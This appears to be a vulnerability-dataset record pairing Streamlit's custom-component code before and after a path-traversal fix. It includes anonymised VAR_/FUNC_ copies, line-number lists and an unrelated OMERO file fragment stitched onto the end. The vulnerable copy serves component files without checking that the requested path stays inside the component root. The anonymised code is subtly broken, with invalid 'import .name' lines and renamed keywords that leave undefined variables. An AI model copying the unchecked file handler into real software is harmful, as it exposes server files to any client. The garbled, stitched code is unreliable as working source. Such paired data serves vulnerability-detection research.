# We use a double-checked locking optimization to avoid the overhead
# of acquiring the lock in the common case:
# https://en.wikipedia.org/wiki/Double-checked_locking
if cls._instance is None:
with cls._instance_lock:
if cls._instance is None:
cls._instance = ComponentRegistry()
return cls._instance
def __init__(self):
self._components = {} # type: Dict[str, CustomComponent]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def register_component(self, component: CustomComponent) -> None:
"""Register a CustomComponent.
Parameters
----------
component : CustomComponent
The component to register.
"""
# Validate the component's path
abspath = component.abspath
if abspath is not None and not os.path.isdir(abspath):
raise StreamlitAPIException(f"No such component directory: '{abspath}'")
with self._lock:
existing = self._components.get(component.name)
self._components[component.name] = component
if existing is not None and component != existing:
LOGGER.warning(
"%s overriding previously-registered %s",
component,
existing,
)
LOGGER.debug("Registered component %s", component)
def get_component_path(self, name: str) -> Optional[str]:
"""Return the filesystem path for the component with the given name.
If no such component is registered, or if the component exists but is
being served from a URL, return None instead.
"""
component = self._components.get(name, None)
return component.abspath if component is not None else None
| # Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
LOGGER = get_logger(__name__)
class MarshallComponentException(StreamlitAPIException):
"""Class for exceptions generated during custom component marshalling."""
pass
class CustomComponent:
"""A Custom Component declaration."""
def __init__(
self,
name: str,
path: Optional[str] = None,
url: Optional[str] = None,
):
if (path is None and url is None) or (path is not None and url is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = name
self.path = path
self.url = url
def __repr__(self) -> str:
return util.repr_(self)
@property
def abspath(self) -> Optional[str]:
"""The absolute path that the component is served from."""
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*args,
default: Any = None,
key: Optional[str] = None,
**kwargs,
) -> Any:
"""An alias for create_instance."""
return self.create_instance(*args, default=default, key=key, **kwargs)
def create_instance(
self,
*args,
default: Any = None,
key: Optional[str] = None,
**kwargs,
) -> Any:
"""Create a new instance of the component.
Parameters
----------
*args
Must be empty; all args must be named. (This parameter exists to
enforce correct use of the function.)
default: any or None
The default return value for the component. This is returned when
the component's frontend hasn't yet specified a value with
`setComponentValue`.
key: str or None
If not None, this is the user key we use to generate the
component's "widget ID".
**kwargs
Keyword args to pass to the component.
Returns
-------
any or None
The component's widget value.
"""
if len(args) > 0:
raise MarshallComponentException(f"Argument '{args[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
# In addition to the custom kwargs passed to the component, we also
# send the special 'default' and 'key' params to the component
# frontend.
all_args = dict(kwargs, **{"default": default, "key": key})
json_args = {}
special_args = []
for arg_name, arg_val in all_args.items():
if type_util.is_bytes_like(arg_val):
bytes_arg = SpecialArg()
bytes_arg.key = arg_name
bytes_arg.bytes = to_bytes(arg_val)
special_args.append(bytes_arg)
elif type_util.is_dataframe_like(arg_val):
dataframe_arg = SpecialArg()
dataframe_arg.key = arg_name
component_arrow.marshall(dataframe_arg.arrow_dataframe.data, arg_val)
special_args.append(dataframe_arg)
else:
json_args[arg_name] = arg_val
try:
serialized_json_args = json.dumps(json_args)
except BaseException as e:
raise MarshallComponentException(
"Could not convert component args to JSON", e
)
def marshall_component(dg, element: Element) -> Union[Any, Type[NoValue]]:
element.component_instance.component_name = self.name
element.component_instance.form_id = current_form_id(dg)
if self.url is not None:
element.component_instance.url = self.url
# Normally, a widget's element_hash (which determines
# its identity across multiple runs of an app) is computed
# by hashing the entirety of its protobuf. This means that,
# if any of the arguments to the widget are changed, Streamlit
# considers it a new widget instance and it loses its previous
# state.
#
# However! If a *component* has a `key` argument, then the
# component's hash identity is determined by entirely by
# `component_name + url + key`. This means that, when `key`
# exists, the component will maintain its identity even when its
# other arguments change, and the component's iframe won't be
# remounted on the frontend.
#
# So: if `key` is None, we marshall the element's arguments
# *before* computing its widget_ui_value (which creates its hash).
# If `key` is not None, we marshall the arguments *after*.
def marshall_element_args():
element.component_instance.json_args = serialized_json_args
element.component_instance.special_args.extend(special_args)
if key is None:
marshall_element_args()
def deserialize_component(ui_value, widget_id=""):
# ui_value is an object from json, an ArrowTable proto, or a bytearray
return ui_value
ctx = get_script_run_ctx()
component_state = register_widget(
element_type="component_instance",
element_proto=element.component_instance,
user_key=key,
widget_func_name=self.name,
deserializer=deserialize_component,
serializer=lambda x: x,
ctx=ctx,
)
widget_value = component_state.value
if key is not None:
marshall_element_args()
if widget_value is None:
widget_value = default
elif isinstance(widget_value, ArrowTableProto):
widget_value = component_arrow.arrow_proto_to_dataframe(widget_value)
# widget_value will be either None or whatever the component's most
# recent setWidgetValue value is. We coerce None -> NoValue,
# because that's what DeltaGenerator._enqueue expects.
return widget_value if widget_value is not None else NoValue
# We currently only support writing to st._main, but this will change
# when we settle on an improved API in a post-layout world.
dg = streamlit._main
element = Element()
return_value = marshall_component(dg, element)
result = dg._enqueue(
"component_instance", element.component_instance, return_value
)
return result
def __eq__(self, other) -> bool:
"""Equality operator."""
return (
isinstance(other, CustomComponent)
and self.name == other.name
and self.path == other.path
and self.url == other.url
)
def __ne__(self, other) -> bool:
"""Inequality operator."""
return not self == other
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def declare_component(
name: str,
path: Optional[str] = None,
url: Optional[str] = None,
) -> CustomComponent:
"""Create and register a custom component.
Parameters
----------
name: str
A short, descriptive name for the component. Like, "slider".
path: str or None
The path to serve the component's frontend files from. Either
`path` or `url` must be specified, but not both.
url: str or None
The URL that the component is served from. Either `path` or `url`
must be specified, but not both.
Returns
-------
CustomComponent
A CustomComponent that can be called like a function.
Calling the component will create a new instance of the component
in the Streamlit app.
"""
# Get our stack frame.
current_frame = inspect.currentframe()
assert current_frame is not None
# Get the stack frame of our calling function.
caller_frame = current_frame.f_back
assert caller_frame is not None
# Get the caller's module name. `__name__` gives us the module's
# fully-qualified name, which includes its package.
module = inspect.getmodule(caller_frame)
assert module is not None
module_name = module.__name__
# If the caller was the main module that was executed (that is, if the
# user executed `python my_component.py`), then this name will be
# "__main__" instead of the actual package name. In this case, we use
# the main module's filename, sans `.py` extension, as the component name.
if module_name == "__main__":
file_path = inspect.getfile(caller_frame)
filename = os.path.basename(file_path)
module_name, _ = os.path.splitext(filename)
# Build the component name.
component_name = f"{module_name}.{name}"
# Create our component object, and register it.
component = CustomComponent(name=component_name, path=path, url=url)
ComponentRegistry.instance().register_component(component)
return component
class ComponentRequestHandler(tornado.web.RequestHandler):
def initialize(self, registry: "ComponentRegistry"):
self._registry = registry
def get(self, path: str) -> None:
parts = path.split("/")
component_name = parts[0]
component_root = self._registry.get_component_path(component_name)
if component_root is None:
self.write("not found")
self.set_status(404)
return
# follow symlinks to get an accurate normalized path
component_root = os.path.realpath(component_root)
filename = "/".join(parts[1:])
abspath = os.path.realpath(os.path.join(component_root, filename))
# Do NOT expose anything outside of the component root.
if os.path.commonprefix([component_root, abspath]) != component_root:
self.write("forbidden")
self.set_status(403)
return
LOGGER.debug("ComponentRequestHandler: GET: %s -> %s", path, abspath)
try:
with open(abspath, "rb") as file:
contents = file.read()
except (OSError) as e:
LOGGER.error(f"ComponentRequestHandler: GET {path} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(contents)
self.set_header("Content-Type", self.get_content_type(abspath))
self.set_extra_headers(path)
def set_extra_headers(self, path) -> None:
"""Disable cache for HTML files.
Other assets like JS and CSS are suffixed with their hash, so they can
be cached indefinitely.
"""
is_index_url = len(path) == 0
if is_index_url or path.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def set_default_headers(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def options(self) -> None:
"""/OPTIONS handler for preflight CORS checks."""
self.set_status(204)
self.finish()
@staticmethod
def get_content_type(abspath) -> str:
"""Returns the ``Content-Type`` header to be used for this request.
From tornado.web.StaticFileHandler.
"""
mime_type, encoding = mimetypes.guess_type(abspath)
# per RFC 6713, use the appropriate type for a gzip compressed file
if encoding == "gzip":
return "application/gzip"
# As of 2015-07-21 there is no bzip2 encoding defined at
# http://www.iana.org/assignments/media-types/media-types.xhtml
# So for that (and any other encoding), use octet-stream.
elif encoding is not None:
return "application/octet-stream"
elif mime_type is not None:
return mime_type
# if mime_type not detected, use application/octet-stream
else:
return "application/octet-stream"
@staticmethod
def get_url(file_id: str) -> str:
"""Return the URL for a component file with the given ID."""
return "components/{}".format(file_id)
class ComponentRegistry:
_instance_lock: threading.Lock = threading.Lock()
_instance: Optional["ComponentRegistry"] = None
@classmethod
def instance(cls) -> "ComponentRegistry":
"""Returns the singleton ComponentRegistry"""
# We use a double-checked locking optimization to avoid the overhead
# of acquiring the lock in the common case:
# https://en.wikipedia.org/wiki/Double-checked_locking
if cls._instance is None:
with cls._instance_lock:
if cls._instance is None:
cls._instance = ComponentRegistry()
return cls._instance
def __init__(self):
self._components = {} # type: Dict[str, CustomComponent]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def register_component(self, component: CustomComponent) -> None:
"""Register a CustomComponent.
Parameters
----------
component : CustomComponent
The component to register.
"""
# Validate the component's path
abspath = component.abspath
if abspath is not None and not os.path.isdir(abspath):
raise StreamlitAPIException(f"No such component directory: '{abspath}'")
with self._lock:
existing = self._components.get(component.name)
self._components[component.name] = component
if existing is not None and component != existing:
LOGGER.warning(
"%s overriding previously-registered %s",
component,
existing,
)
LOGGER.debug("Registered component %s", component)
def get_component_path(self, name: str) -> Optional[str]:
"""Return the filesystem path for the component with the given name.
If no such component is registered, or if the component exists but is
being served from a URL, return None instead.
"""
component = self._components.get(name, None)
return component.abspath if component is not None else None
| path_disclosure | {
"code": [
" abspath = os.path.join(component_root, filename)"
],
"line_no": [
320
]
} | {
"code": [
" component_root = os.path.realpath(component_root)",
" abspath = os.path.realpath(os.path.join(component_root, filename))",
" if os.path.commonprefix([component_root, abspath]) != component_root:",
" self.write(\"forbidden\")",
" self.set_status(403)",
" return"
],
"line_no": [
320,
322,
325,
326,
327,
328
]
} |
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import .get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import .get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
VAR_0 = get_logger(__name__)
class CLASS_0(StreamlitAPIException):
pass
class CLASS_1:
def __init__(
self,
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
):
if (VAR_2 is None and VAR_3 is None) or (VAR_2 is not None and VAR_3 is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = VAR_1
self.path = VAR_2
self.url = VAR_3
def __repr__(self) -> str:
return util.repr_(self)
@property
def VAR_16(self) -> Optional[str]:
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
return self.create_instance(*VAR_4, VAR_5=default, VAR_6=key, **VAR_7)
def FUNC_2(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
if len(VAR_4) > 0:
raise CLASS_0(f"Argument '{VAR_4[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import .component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
VAR_19 = dict(VAR_7, **{"default": VAR_5, "key": VAR_6})
VAR_20 = {}
VAR_21 = []
for VAR_44, arg_val in VAR_19.items():
if type_util.is_bytes_like(arg_val):
VAR_41 = SpecialArg()
VAR_41.key = VAR_44
VAR_41.bytes = to_bytes(arg_val)
VAR_21.append(VAR_41)
elif type_util.is_dataframe_like(arg_val):
VAR_43 = SpecialArg()
VAR_43.key = VAR_44
component_arrow.marshall(VAR_43.arrow_dataframe.data, arg_val)
VAR_21.append(VAR_43)
else:
VAR_20[VAR_44] = arg_val
try:
VAR_34 = json.dumps(VAR_20)
except BaseException as e:
raise CLASS_0(
"Could not convert VAR_14 VAR_4 to JSON", e
)
def FUNC_13(VAR_22, VAR_23: Element) -> Union[Any, Type[NoValue]]:
VAR_23.component_instance.component_name = self.name
VAR_23.component_instance.form_id = current_form_id(VAR_22)
if self.url is not None:
VAR_23.component_instance.url = self.url
def FUNC_14():
VAR_23.component_instance.json_args = VAR_34
VAR_23.component_instance.special_args.extend(VAR_21)
if VAR_6 is None:
FUNC_14()
def FUNC_15(VAR_35, VAR_36=""):
return VAR_35
VAR_37 = get_script_run_ctx()
VAR_38 = register_widget(
element_type="component_instance",
element_proto=VAR_23.component_instance,
user_key=VAR_6,
widget_func_name=self.name,
deserializer=FUNC_15,
serializer=lambda x: x,
VAR_37=ctx,
)
VAR_39 = VAR_38.value
if VAR_6 is not None:
FUNC_14()
if VAR_39 is None:
VAR_39 = VAR_5
elif isinstance(VAR_39, ArrowTableProto):
VAR_39 = component_arrow.arrow_proto_to_dataframe(VAR_39)
return VAR_39 if VAR_39 is not None else NoValue
VAR_22 = streamlit._main
VAR_23 = Element()
VAR_24 = FUNC_13(VAR_22, VAR_23)
VAR_25 = VAR_22._enqueue(
"component_instance", VAR_23.component_instance, VAR_24
)
return VAR_25
def __eq__(self, VAR_8) -> bool:
return (
isinstance(VAR_8, CLASS_1)
and self.name == VAR_8.name
and self.path == VAR_8.path
and self.url == VAR_8.url
)
def __ne__(self, VAR_8) -> bool:
return not self == VAR_8
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def FUNC_0(
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
) -> CLASS_1:
VAR_9 = inspect.currentframe()
assert VAR_9 is not None
VAR_10 = VAR_9.f_back
assert VAR_10 is not None
VAR_11 = inspect.getmodule(VAR_10)
assert VAR_11 is not None
VAR_12 = VAR_11.__name__
if VAR_12 == "__main__":
VAR_26 = inspect.getfile(VAR_10)
VAR_27 = os.path.basename(VAR_26)
VAR_12, VAR_28 = os.path.splitext(VAR_27)
VAR_13 = f"{VAR_12}.{VAR_1}"
VAR_14 = CLASS_1(VAR_1=VAR_13, VAR_2=path, VAR_3=url)
CLASS_3.instance().register_component(VAR_14)
return VAR_14
class CLASS_2(tornado.web.RequestHandler):
def FUNC_3(self, VAR_15: "ComponentRegistry"):
self._registry = VAR_15
def FUNC_4(self, VAR_2: str) -> None:
VAR_29 = VAR_2.split("/")
VAR_13 = VAR_29[0]
VAR_30 = self._registry.get_component_path(VAR_13)
if VAR_30 is None:
self.write("not found")
self.set_status(404)
return
VAR_27 = "/".join(VAR_29[1:])
VAR_16 = os.path.join(VAR_30, VAR_27)
VAR_0.debug("ComponentRequestHandler: GET: %s -> %s", VAR_2, VAR_16)
try:
with open(VAR_16, "rb") as file:
VAR_42 = file.read()
except (OSError) as e:
VAR_0.error(f"ComponentRequestHandler: GET {VAR_2} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(VAR_42)
self.set_header("Content-Type", self.get_content_type(VAR_16))
self.set_extra_headers(VAR_2)
def FUNC_5(self, VAR_2) -> None:
VAR_31 = len(VAR_2) == 0
if VAR_31 or VAR_2.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def FUNC_6(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def FUNC_7(self) -> None:
self.set_status(204)
self.finish()
@staticmethod
def FUNC_8(VAR_16) -> str:
VAR_32, VAR_33 = mimetypes.guess_type(VAR_16)
if VAR_33 == "gzip":
return "application/gzip"
elif VAR_33 is not None:
return "application/octet-stream"
elif VAR_32 is not None:
return VAR_32
else:
return "application/octet-stream"
@staticmethod
def FUNC_9(VAR_17: str) -> str:
return "components/{}".format(VAR_17)
class CLASS_3:
_instance_lock: threading.Lock = threading.Lock()
_instance: Optional["ComponentRegistry"] = None
@classmethod
def FUNC_10(VAR_18) -> "ComponentRegistry":
if VAR_18._instance is None:
with VAR_18._instance_lock:
if VAR_18._instance is None:
VAR_18._instance = CLASS_3()
return VAR_18._instance
def __init__(self):
self._components = {} # type: Dict[str, CLASS_1]
self._lock = threading.Lock()
def __repr__(self) -> str:
return util.repr_(self)
def FUNC_11(self, VAR_14: CLASS_1) -> None:
VAR_16 = VAR_14.abspath
if VAR_16 is not None and not os.path.isdir(VAR_16):
raise StreamlitAPIException(f"No such VAR_14 directory: '{VAR_16}'")
with self._lock:
VAR_40 = self._components.get(VAR_14.name)
self._components[VAR_14.name] = VAR_14
if VAR_40 is not None and VAR_14 != VAR_40:
VAR_0.warning(
"%s overriding previously-registered %s",
VAR_14,
VAR_40,
)
VAR_0.debug("Registered VAR_14 %s", VAR_14)
def FUNC_12(self, VAR_1: str) -> Optional[str]:
VAR_14 = self._components.get(VAR_1, None)
return VAR_14.abspath if VAR_14 is not None else None
|
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import .get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import .get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
VAR_0 = get_logger(__name__)
class CLASS_0(StreamlitAPIException):
pass
class CLASS_1:
def __init__(
self,
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
):
if (VAR_2 is None and VAR_3 is None) or (VAR_2 is not None and VAR_3 is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = VAR_1
self.path = VAR_2
self.url = VAR_3
def __repr__(self) -> str:
return util.repr_(self)
@property
def VAR_16(self) -> Optional[str]:
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
return self.create_instance(*VAR_4, VAR_5=default, VAR_6=key, **VAR_7)
def FUNC_2(
self,
*VAR_4,
VAR_5: Any = None,
VAR_6: Optional[str] = None,
**VAR_7,
) -> Any:
if len(VAR_4) > 0:
raise CLASS_0(f"Argument '{VAR_4[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import .component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
VAR_19 = dict(VAR_7, **{"default": VAR_5, "key": VAR_6})
VAR_20 = {}
VAR_21 = []
for VAR_44, arg_val in VAR_19.items():
if type_util.is_bytes_like(arg_val):
VAR_41 = SpecialArg()
VAR_41.key = VAR_44
VAR_41.bytes = to_bytes(arg_val)
VAR_21.append(VAR_41)
elif type_util.is_dataframe_like(arg_val):
VAR_43 = SpecialArg()
VAR_43.key = VAR_44
component_arrow.marshall(VAR_43.arrow_dataframe.data, arg_val)
VAR_21.append(VAR_43)
else:
VAR_20[VAR_44] = arg_val
try:
VAR_34 = json.dumps(VAR_20)
except BaseException as e:
raise CLASS_0(
"Could not convert VAR_14 VAR_4 to JSON", e
)
def FUNC_13(VAR_22, VAR_23: Element) -> Union[Any, Type[NoValue]]:
VAR_23.component_instance.component_name = self.name
VAR_23.component_instance.form_id = current_form_id(VAR_22)
if self.url is not None:
VAR_23.component_instance.url = self.url
def FUNC_14():
VAR_23.component_instance.json_args = VAR_34
VAR_23.component_instance.special_args.extend(VAR_21)
if VAR_6 is None:
FUNC_14()
def FUNC_15(VAR_35, VAR_36=""):
return VAR_35
VAR_37 = get_script_run_ctx()
VAR_38 = register_widget(
element_type="component_instance",
element_proto=VAR_23.component_instance,
user_key=VAR_6,
widget_func_name=self.name,
deserializer=FUNC_15,
serializer=lambda x: x,
VAR_37=ctx,
)
VAR_39 = VAR_38.value
if VAR_6 is not None:
FUNC_14()
if VAR_39 is None:
VAR_39 = VAR_5
elif isinstance(VAR_39, ArrowTableProto):
VAR_39 = component_arrow.arrow_proto_to_dataframe(VAR_39)
return VAR_39 if VAR_39 is not None else NoValue
VAR_22 = streamlit._main
VAR_23 = Element()
VAR_24 = FUNC_13(VAR_22, VAR_23)
VAR_25 = VAR_22._enqueue(
"component_instance", VAR_23.component_instance, VAR_24
)
return VAR_25
def __eq__(self, VAR_8) -> bool:
return (
isinstance(VAR_8, CLASS_1)
and self.name == VAR_8.name
and self.path == VAR_8.path
and self.url == VAR_8.url
)
def __ne__(self, VAR_8) -> bool:
return not self == VAR_8
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def FUNC_0(
VAR_1: str,
VAR_2: Optional[str] = None,
VAR_3: Optional[str] = None,
) -> CLASS_1:
VAR_9 = inspect.currentframe()
assert VAR_9 is not None
VAR_10 = VAR_9.f_back
assert VAR_10 is not None
VAR_11 = inspect.getmodule(VAR_10)
assert VAR_11 is not None
VAR_12 = VAR_11.__name__
if VAR_12 == "__main__":
VAR_26 = inspect.getfile(VAR_10)
VAR_27 = os.path.basename(VAR_26)
VAR_12, VAR_28 = os.path.splitext(VAR_27)
VAR_13 = f"{VAR_12}.{VAR_1}"
VAR_14 = CLASS_1(VAR_1=VAR_13, VAR_2=path, VAR_3=url)
CLASS_3.instance().register_component(VAR_14)
return VAR_14
class CLASS_2(tornado.web.RequestHandler):
def FUNC_3(self, VAR_15: "ComponentRegistry"):
self._registry = VAR_15
def FUNC_4(self, VAR_2: str) -> None:
VAR_29 = VAR_2.split("/")
VAR_13 = VAR_29[0]
VAR_30 = self._registry.get_component_path(VAR_13)
if VAR_30 is None:
self.write("not found")
self.set_status(404)
return
VAR_30 = os.path.realpath(VAR_30)
VAR_27 = "/".join(VAR_29[1:])
VAR_16 = os.path.realpath(os.path.join(VAR_30, VAR_27))
if os.path.commonprefix([VAR_30, VAR_16]) != VAR_30:
self.write("forbidden")
self.set_status(403)
return
VAR_0.debug("ComponentRequestHandler: GET: %s -> %s", VAR_2, VAR_16)
try:
with open(VAR_16, "rb") as file:
VAR_42 = file.read()
except (OSError) as e:
VAR_0.error(f"ComponentRequestHandler: GET {VAR_2} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(VAR_42)
self.set_header("Content-Type", self.get_content_type(VAR_16))
self.set_extra_headers(VAR_2)
def FUNC_5(self, VAR_2) -> None:
VAR_31 = len(VAR_2) == 0
if VAR_31 or VAR_2.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def FUNC_6(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def FUNC_7(self) -> None:
self.set_status(204)
self.finish()
@staticmethod
def FUNC_8(VAR_16) -> str:
VAR_32, VAR_33 = mimetypes.guess_type(VAR_16)
if VAR_33 == "gzip":
return "application/gzip"
elif VAR_33 is not None:
return "application/octet-stream"
elif VAR_32 is not None:
return VAR_32
else:
return "application/octet-stream"
@staticmethod
def FUNC_9(VAR_17: str) -> str:
return "components/{}".format(VAR_17)
class CLASS_3:
    """Process-wide registry of custom components, keyed by component name.

    Access it through FUNC_10(); constructing CLASS_3 directly yields an
    independent, non-singleton registry.
    """

    _instance_lock: threading.Lock = threading.Lock()
    _instance: Optional["ComponentRegistry"] = None

    @classmethod
    def FUNC_10(VAR_18) -> "ComponentRegistry":
        """Return the singleton registry, creating it on first use."""
        # Double-checked locking: cheap unlocked read on the hot path,
        # re-checked under the lock so only one instance is ever built.
        if VAR_18._instance is None:
            with VAR_18._instance_lock:
                if VAR_18._instance is None:
                    VAR_18._instance = CLASS_3()
        return VAR_18._instance

    def __init__(self):
        # Maps component name -> registered component declaration.
        self._components = {}  # type: Dict[str, CLASS_1]
        # Guards concurrent mutation of the mapping.
        self._lock = threading.Lock()

    def __repr__(self) -> str:
        return util.repr_(self)

    def FUNC_11(self, VAR_14: CLASS_1) -> None:
        """Register *VAR_14*, replacing any earlier entry with the same name.

        Raises StreamlitAPIException when the declared asset directory
        does not exist on disk.
        """
        VAR_16 = VAR_14.abspath
        if VAR_16 is not None and not os.path.isdir(VAR_16):
            raise StreamlitAPIException(f"No such VAR_14 directory: '{VAR_16}'")

        with self._lock:
            previous = self._components.get(VAR_14.name)
            self._components[VAR_14.name] = VAR_14
            if previous is not None and VAR_14 != previous:
                VAR_0.warning(
                    "%s overriding previously-registered %s",
                    VAR_14,
                    previous,
                )
            VAR_0.debug("Registered VAR_14 %s", VAR_14)

    def FUNC_12(self, VAR_1: str) -> Optional[str]:
        """Return the registered asset path for *VAR_1*, or None if unknown."""
        VAR_14 = self._components.get(VAR_1, None)
        if VAR_14 is None:
            return None
        return VAR_14.abspath
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
21,
24,
35,
37,
38,
41,
43,
44,
47,
58,
62,
65,
72,
82,
91,
106,
111,
115,
123,
125,
128,
129,
130,
131,
133,
149,
156,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
184,
187,
189,
191,
203,
206,
211,
212,
213,
214,
216,
217,
218,
220,
226,
228,
237,
241,
244,
245,
252,
263,
270,
272,
273,
276,
277,
280,
281,
282,
286,
287,
288,
289,
290,
295,
296,
298,
299,
302,
304,
305,
309,
318,
321,
323,
332,
335,
337,
340,
345,
350,
354,
359,
366,
369,
370,
371,
376,
379,
384,
385,
389,
393,
394,
395,
401,
405,
408,
411,
417,
418,
422,
426,
433,
435,
438,
444,
40,
46,
251,
252,
253,
254,
255,
256,
257,
258,
259,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
68,
80,
90,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
230,
239,
339,
340,
341,
342,
343,
356,
362,
363,
364,
382,
392,
410,
411,
412,
413,
414,
415,
416,
437,
438,
439,
440,
441
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
21,
24,
35,
37,
38,
41,
43,
44,
47,
58,
62,
65,
72,
82,
91,
106,
111,
115,
123,
125,
128,
129,
130,
131,
133,
149,
156,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
184,
187,
189,
191,
203,
206,
211,
212,
213,
214,
216,
217,
218,
220,
226,
228,
237,
241,
244,
245,
252,
263,
270,
272,
273,
276,
277,
280,
281,
282,
286,
287,
288,
289,
290,
295,
296,
298,
299,
302,
304,
305,
309,
318,
319,
323,
324,
329,
331,
340,
343,
345,
348,
353,
358,
362,
367,
374,
377,
378,
379,
384,
387,
392,
393,
397,
401,
402,
403,
409,
413,
416,
419,
425,
426,
430,
434,
441,
443,
446,
452,
40,
46,
251,
252,
253,
254,
255,
256,
257,
258,
259,
260,
261,
262,
263,
264,
265,
266,
267,
268,
269,
270,
271,
68,
80,
90,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
110,
111,
112,
230,
239,
347,
348,
349,
350,
351,
364,
370,
371,
372,
390,
400,
418,
419,
420,
421,
422,
423,
424,
445,
446,
447,
448,
449
] |
4CWE-601
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
#
# Copyright (c) 2008-2015 University of Dundee.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: Aleksandra Tarkowska <A(dot)Tarkowska(at)dundee(dot)ac(dot)uk>, 2008.
#
# Version: 1.0
#
import datetime
import time
import logging
from django.conf import settings
from django import forms
from django.forms.formsets import formset_factory
from django.core.urlresolvers import reverse
from omeroweb.custom_forms import NonASCIIForm
from .custom_forms import MetadataModelChoiceField
